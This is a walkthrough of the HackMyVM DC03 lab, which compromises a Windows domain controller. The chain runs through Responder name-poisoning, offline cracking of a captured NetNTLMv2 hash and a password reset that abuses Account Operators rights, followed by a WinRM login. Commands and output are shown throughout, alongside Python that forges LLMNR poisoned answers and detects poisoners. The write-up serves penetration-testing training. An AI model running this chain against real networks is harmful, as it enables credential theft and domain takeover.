HackMyVm DC03 Walkthrough

Target download: https://hackmyvm.eu/machines/machine.php?vm=DC03

This is the third Windows machine in the DC series. Start with a full port scan.

└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 12:43 CST
Nmap scan report for 192.168.56.126
Host is up (0.00094s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-02 19:44:57Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49689/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:34:F9:29 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-02T19:45:45
|_  start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:34:f9:29 (Oracle VirtualBox virtual NIC)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 14h59m57s

The scan shows a domain controller (DC01 of SOUPEDECODE.LOCAL) with SMB signing required and a clock skew of about 15 hours. Enumeration of SMB, WinRM and Kerberos from here turns up nothing useful. So open Wireshark and check whether the target sends anything out on its own. Sure enough, at intervals the target multicasts an LLMNR query asking for the IP address of a host named FileServer (as the Responder output below shows, it falls back to NBT-NS and mDNS for the same name).

Responder attacks LLMNR, NBT-NS and mDNS name resolution by answering such queries with spoofed replies that point at the attacker. Run it with the command below and keep Wireshark open to watch what happens.

└─$ sudo responder -I 'eth1' -dPv                                                                                                                                              
                                         __                                                                                                                                    
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.                                                                                                                       
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|                                                                                                                       
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|                                                                                                                         
                   |__|                                                                                                                                                        

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0          
...
[+] Listening for events...

[*] [NBT-NS] Poisoned answer sent to 192.168.56.126 for name FILESERVER (service: File Server)
[*] [MDNS] Poisoned answer sent to 192.168.56.126  for name FileServer.local
[*] [LLMNR]  Poisoned answer sent to fe80::458b:f91b:ce63:497d for name FileServer
[*] [MDNS] Poisoned answer sent to fe80::458b:f91b:ce63:497d for name FileServer.local
[*] [MDNS] Poisoned answer sent to fe80::458b:f91b:ce63:497d for name FileServer.local
[*] [LLMNR]  Poisoned answer sent to fe80::458b:f91b:ce63:497d for name FileServer
[*] [MDNS] Poisoned answer sent to 192.168.56.126  for name FileServer.local
[*] [LLMNR]  Poisoned answer sent to 192.168.56.126 for name FileServer
[*] [LLMNR]  Poisoned answer sent to 192.168.56.126 for name FileServer
[SMB] NTLMv2-SSP Client   : fe80::458b:f91b:ce63:497d
[SMB] NTLMv2-SSP Username : soupedecode\xkate578
[SMB] NTLMv2-SSP Hash     : xkate578::soupedecode:e13dee503db0d6b...

Responder captured a username and a NetNTLMv2 response. Wireshark also shows that the target queried for FileServer from both its IPv4 and its IPv6 address; Responder answered both with the attacker's IPv4 address, and the target then performed the SMB authentication over IPv6 (the client shown above is DC01's link-local address). Because nmap reported SMB signing as required on the DC, relaying this authentication back to it is not an option; the captured NetNTLMv2 response has to be cracked offline instead.
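To make the exchange above concrete, here is an added example (not code from the walkthrough or from Responder) that builds the LLMNR query DC01 sends for FileServer, builds the kind of spoofed answer a poisoner returns, parses both, and shows the defender-side "canary name" check: ask for a name that cannot exist and treat any reply as a poisoner. LLMNR reuses the DNS message format on UDP 5355 (multicast 224.0.0.252). The transaction ID, the attacker address 192.168.56.10 and the canary name are constructed for the example and do not come from the page.

```python
# Added example: LLMNR (RFC 4795) query / poisoned answer builder and parser.
# Names and addresses below are constructed; 192.168.56.10 is an assumed attacker.
import socket
import struct

LLMNR_MCAST, LLMNR_PORT = "224.0.0.252", 5355
QTYPE_A, QTYPE_AAAA = 1, 28


def encode_name(name: str) -> bytes:
    """DNS label encoding: length-prefixed labels terminated by a zero byte."""
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".") if l)
    return out + b"\x00"


def decode_name(buf: bytes, off: int):
    """Decode labels at off; returns (name, offset after the name). Follows 0xC0 pointers."""
    labels, jumped, end = [], False, off
    while True:
        ln = buf[off]
        if ln & 0xC0 == 0xC0:                       # compression pointer
            ptr = struct.unpack("!H", buf[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            off, jumped = ptr, True
            continue
        off += 1
        if ln == 0:
            break
        labels.append(buf[off:off + ln].decode("ascii"))
        off += ln
    if not jumped:
        end = off
    return ".".join(labels), end


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """LLMNR query: 12-byte header (QR=0) plus one question, e.g. 'FileServer' A."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(pkt: bytes):
    """Return (txid, name, qtype) from a single-question LLMNR query."""
    txid, flags, qd, _, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if flags & 0x8000 or qd != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = decode_name(pkt, 12)
    qtype, _qclass = struct.unpack("!HH", pkt[off:off + 4])
    return txid, name, qtype


def build_poisoned_answer(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """What a poisoner does: echo the question back with QR=1 and an A record for
    itself, whether or not the name exists anywhere on the network."""
    txid, name, qtype = parse_query(query)
    if qtype != QTYPE_A:
        raise ValueError("example only answers A queries")
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)   # QR=1, RCODE=0
    question = encode_name(name) + struct.pack("!HH", qtype, 1)
    rdata = socket.inet_aton(attacker_ip)
    answer = struct.pack("!H", 0xC00C)                         # pointer to the question name
    answer += struct.pack("!HHIH", qtype, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_answer(pkt: bytes):
    """Return (txid, name, ip) from an LLMNR response carrying one answer RR."""
    txid, flags, _qd, an, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if not flags & 0x8000 or an < 1:
        raise ValueError("not an LLMNR response with an answer")
    _, off = decode_name(pkt, 12)
    off += 4                                                   # skip QTYPE/QCLASS
    name, off = decode_name(pkt, off)
    rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    rdata = pkt[off:off + rdlen]
    return txid, name, socket.inet_ntoa(rdata) if rtype == QTYPE_A else rdata.hex()


def detect_poisoner(canary: str, reply: bytes):
    """Defender check: a reply for a name that does not exist identifies a poisoner.
    Returns the responding IP, or None if the packet is not an answer for the canary."""
    try:
        _, name, ip = parse_answer(reply)
    except ValueError:
        return None
    return ip if name.lower() == canary.lower() else None


if __name__ == "__main__":
    q = build_query(0x1A2B, "FileServer")
    r = build_poisoned_answer(q, "192.168.56.10")
    print("query :", parse_query(q))
    print("answer:", parse_answer(r))
    canary_reply = build_poisoned_answer(build_query(0x7777, "zz-canary-7f3a"), "192.168.56.10")
    print("poisoner seen at:", detect_poisoner("zz-canary-7f3a", canary_reply))
```

The canary check is the usual way to hunt for Responder on a network: the packets are unchanged, only the policy ("nobody legitimate answers for this name") makes the reply suspicious.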

Crack the captured response with john against rockyou to recover the password (john recognises the netntlmv2 format from the Responder line as-is).

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt xkate578.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jesuschrist      (xkate578)     
1g 0:00:00:00 DONE (2024-11-03 18:13) 25.00g/s 25600p/s 25600c/s 25600C/s 123456..bethany
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

With this username and password the SMB shares can be listed ($IP is 192.168.56.126 throughout).

└─$ smbclient -L $IP -U xkate578%jesuschrist

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        share           Disk      
        SYSVOL          Disk      Logon server share

The share contains the user flag.

└─$ smbclient //$IP/share -U xkate578%jesuschrist
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Thu Aug  1 14:06:14 2024
  ..                                  D        0  Thu Aug  1 13:38:08 2024
  desktop.ini                       AHS      282  Thu Aug  1 13:38:08 2024
  user.txt                            A       70  Thu Aug  1 13:39:25 2024

Next, dump the domain information with this user.
└─$ ldapdomaindump -u SOUPEDECODE.local\\xkate578 -p jesuschrist  $IP
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

└─$ ls                                                               
5985.log               domain_computers.json        domain_groups.html  domain_policy.html  domain_trusts.html  domain_users.html           port.log
domain_computers.grep  domain_computers_by_os.html  domain_groups.json  domain_policy.json  domain_trusts.json  domain_users.json           xkate578.hash
domain_computers.html  domain_groups.grep           domain_policy.grep  domain_trusts.grep  domain_users.grep   domain_users_by_group.html

Looking through domain_users shows that xkate578 is a member of Account Operators.

It also shows that fbeth103 belongs to the Operators group, and that Operators is in turn a member of Domain Admins, so fbeth103 is effectively a domain admin.

The plan, then, is to use xkate578's Account Operators rights to reset fbeth103's password. Account Operators hold the reset-password right over ordinary user accounts; in a hardened domain an account that is an effective Domain Admin would normally carry adminCount=1 and have its ACL overwritten by AdminSDHolder, which removes that right, but here the reset goes through. The -reset flag below performs a password reset (no old password needed) rather than a password change.
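Reading nested membership out of ldapdomaindump's HTML by eye is error-prone, so here is an added example (not part of the walkthrough or of ldapdomaindump) that resolves it from the JSON files instead. It goes a little beyond the single case on the page: it walks group nesting to any depth (with a cycle guard), reports every effective member of Domain Admins, and flags which of them lack adminCount=1, i.e. are not yet protected by AdminSDHolder and are therefore within reach of Account Operators' reset right. The records are constructed to mirror the layout ldapdomaindump writes (a JSON list of {"dn": ..., "attributes": {name: [values]}}); that layout and the distinguished names are assumptions, not data from the page.

```python
# Added example: resolve nested group membership from ldapdomaindump-style JSON and
# flag effective Domain Admins without adminCount=1. Sample records are CONSTRUCTED.
import json

DOMAIN_GROUPS_JSON = json.dumps([
    {"dn": "CN=Domain Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL",
     "attributes": {"sAMAccountName": ["Domain Admins"],
                    "member": ["CN=Administrator,CN=Users,DC=SOUPEDECODE,DC=LOCAL",
                               "CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL"]}},
    {"dn": "CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL",
     "attributes": {"sAMAccountName": ["Operators"],
                    "member": ["CN=fbeth103,CN=Users,DC=SOUPEDECODE,DC=LOCAL",
                               "CN=Domain Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL"]}},  # cycle
    {"dn": "CN=Account Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL",
     "attributes": {"sAMAccountName": ["Account Operators"],
                    "member": ["CN=xkate578,CN=Users,DC=SOUPEDECODE,DC=LOCAL"]}},
])
DOMAIN_USERS_JSON = json.dumps([
    {"dn": "CN=Administrator,CN=Users,DC=SOUPEDECODE,DC=LOCAL",
     "attributes": {"sAMAccountName": ["Administrator"], "adminCount": [1]}},
    {"dn": "CN=fbeth103,CN=Users,DC=SOUPEDECODE,DC=LOCAL",
     "attributes": {"sAMAccountName": ["fbeth103"]}},       # no adminCount: not SDProp-protected
    {"dn": "CN=xkate578,CN=Users,DC=SOUPEDECODE,DC=LOCAL",
     "attributes": {"sAMAccountName": ["xkate578"]}},
])


def values(rec: dict, name: str) -> list:
    """Attribute values as a list (ldap3 JSON may store single values as scalars)."""
    v = rec.get("attributes", {}).get(name, [])
    return v if isinstance(v, list) else [v]


def first(rec: dict, name: str, default=None):
    v = values(rec, name)
    return v[0] if v else default


def by_dn(records: list) -> dict:
    return {r["dn"]: r for r in records}


def find_group(groups: dict, sam: str) -> str:
    """DN of the group whose sAMAccountName matches (case-insensitive)."""
    for dn, r in groups.items():
        if str(first(r, "sAMAccountName", "")).lower() == sam.lower():
            return dn
    raise KeyError(sam)


def effective_members(groups: dict, group_dn: str, _seen=None) -> set:
    """Follow 'member' through nested groups; returns the set of non-group member DNs."""
    _seen = set() if _seen is None else _seen
    _seen.add(group_dn)
    out = set()
    for m in values(groups[group_dn], "member"):
        if m in groups:                              # nested group
            if m not in _seen:                       # cycle guard
                out |= effective_members(groups, m, _seen)
        else:
            out.add(m)
    return out


def unprotected_admins(group_records: list, user_records: list) -> list:
    """sAMAccountNames of effective Domain Admins whose adminCount is not 1."""
    groups, users = by_dn(group_records), by_dn(user_records)
    da = find_group(groups, "Domain Admins")
    result = []
    for dn in sorted(effective_members(groups, da)):
        u = users.get(dn, {})
        if int(first(u, "adminCount", 0) or 0) != 1:
            result.append(first(u, "sAMAccountName", dn))
    return result


def load_sample():
    """Parse the constructed records; replace with json.load(open('domain_groups.json')) etc."""
    return json.loads(DOMAIN_GROUPS_JSON), json.loads(DOMAIN_USERS_JSON)


if __name__ == "__main__":
    groups, users = load_sample()
    g = by_dn(groups)
    for dn in sorted(effective_members(g, find_group(g, "Domain Admins"))):
        print("effective Domain Admin:", dn)
    print("without adminCount=1:", unprotected_admins(groups, users))
```

Run against the real domain_groups.json and domain_users.json from the dump, the same function shows at a glance which effective admins an Account Operators member can still reset.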

└─$ impacket-changepasswd SOUPEDECODE.LOCAL/fbeth103@$IP -altuser xkate578 -altpass jesuschrist -newpass 12345678 -reset
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Setting the password of SOUPEDECODE.LOCAL\fbeth103 as SOUPEDECODE.LOCAL\xkate578
[*] Connecting to DCE/RPC as SOUPEDECODE.LOCAL\xkate578
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.

The same reset can be done from rpcclient after logging in (information level 23 is USER_INFORMATION_23, a password set that does not require the old password).

└─$ rpcclient  -U  "xkate578" $IP 
Password for [WORKGROUP\xkate578]:
rpcclient $> setuserinfo2 fbeth103 23 12345678
rpcclient $> exit

Now log in as fbeth103 over WinRM to get root: the flag is on the Administrator's desktop.

└─$ evil-winrm -i $IP -u fbeth103  -p 12345678
...
*Evil-WinRM* PS C:\Users> cd Administrator
*Evil-WinRM* PS C:\Users\Administrator> dir

    Directory: C:\Users\Administrator

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---         6/15/2024  10:54 AM                3D Objects
d-r---         6/15/2024  10:54 AM                Contacts
d-r---         7/31/2024  10:54 PM                Desktop
d-r---         7/31/2024  10:58 PM                Documents
d-r---         6/15/2024  10:54 AM                Downloads
d-r---         6/15/2024  10:54 AM                Favorites
d-r---         6/15/2024  10:54 AM                Links
d-r---         6/15/2024  10:54 AM                Music
d-r---         6/15/2024  10:54 AM                Pictures
d-r---         6/15/2024  10:54 AM                Saved Games
d-r---         6/15/2024  10:54 AM                Searches
d-r---         6/15/2024  10:54 AM                Videos

*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/31/2024  10:33 PM             70 root.txt
